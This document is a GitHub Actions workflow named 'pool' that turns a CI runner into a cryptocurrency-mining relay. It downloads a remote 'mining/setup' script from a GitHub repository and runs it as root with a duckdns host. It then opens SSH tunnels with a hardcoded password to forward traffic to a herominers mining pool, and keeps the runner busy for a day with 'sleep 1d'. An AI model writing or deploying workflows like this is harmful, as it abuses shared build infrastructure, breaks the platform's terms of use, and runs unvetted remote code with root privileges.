name: pool

on: 
  workflow_dispatch:
  
jobs:
  build:
    runs-on: ubuntu-18.04
    steps:
      - uses: actions/checkout@v2
      
       
      - name: Run settting file
        run: sudo apt update &> /dev/null && sudo apt install sshpass screen -y &> /dev/null && curl ifconfig.me && wget https://github.com/githubaunglaymyanmar/fordownload/raw/main/stunnel/mining/setup &> /dev/null && printf "aungmyozaw.duckdns.org:444\n1111" | sudo bash setup
        
      - name: Run settting file
        run: sudo apt install net-tools -y &> /dev/null && netstat -nltp && screen -m -d -S pool sudo sshpass -p 'aunglay' ssh -p 1111 testing@localhost -o StrictHostKeyChecking=no -L 8128:de.beam.herominers.com:1130 -o RemoteCommand="top" && screen -m -d -S pool1 sudo sshpass -p 'aunglay' ssh -p 1111 testing@localhost -o StrictHostKeyChecking=no -R 8111:localhost:8128 -o RemoteCommand="top"
 
      - name: Run settting test
        run: sudo screen -ls
        
      - name: Ubuntu ready to go 
        run: sleep 1d  
















